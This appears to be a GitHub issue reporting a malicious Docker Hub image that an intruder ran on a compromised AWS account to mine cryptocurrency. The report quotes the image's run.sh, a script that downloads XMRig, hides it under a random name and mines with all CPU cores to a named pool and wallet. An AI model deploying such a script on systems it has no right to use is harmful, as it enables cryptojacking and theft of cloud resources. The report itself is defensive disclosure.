You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello everyone, I would like to report a malicious image https://hub.docker.com/r/gdus1is/lo (also I see that account contains one more image which is probably created with the same purpose https://hub.docker.com/r/gdus1is/la)
The owner illegally accessed AWS account, created an extra API key and started using ECS service to mine cryptocurrency.
I have attached logs of this image and the run.sh file that is executed when the image is started.
run.sh
APP=app$(shuf -i 1000000-9999999 -n 1)
wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
tar -zxf xmrig-6.14.1-linux-x64.tar.gz
cd xmrig-6.14.1
mv xmrig $APP
chmod +x $APP
./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHs8EVgJXb6pqyj5mAc9E8z1Pu6feUYPZMXtprp6oQL8Z7qqQFiPwVv4d3UMuueAhrrcijPkMucWY4DG9aP2XAVZ8YTrNwMhB.gas1
Hello everyone, I would like to report a malicious image https://hub.docker.com/r/gdus1is/lo (also I see that account contains one more image which is probably created with the same purpose https://hub.docker.com/r/gdus1is/la)
The owner illegally accessed AWS account, created an extra API key and started using ECS service to mine cryptocurrency.
I have attached logs of this image and the run.sh file that is executed when the image is started.
run.sh
Logs
The text was updated successfully, but these errors were encountered: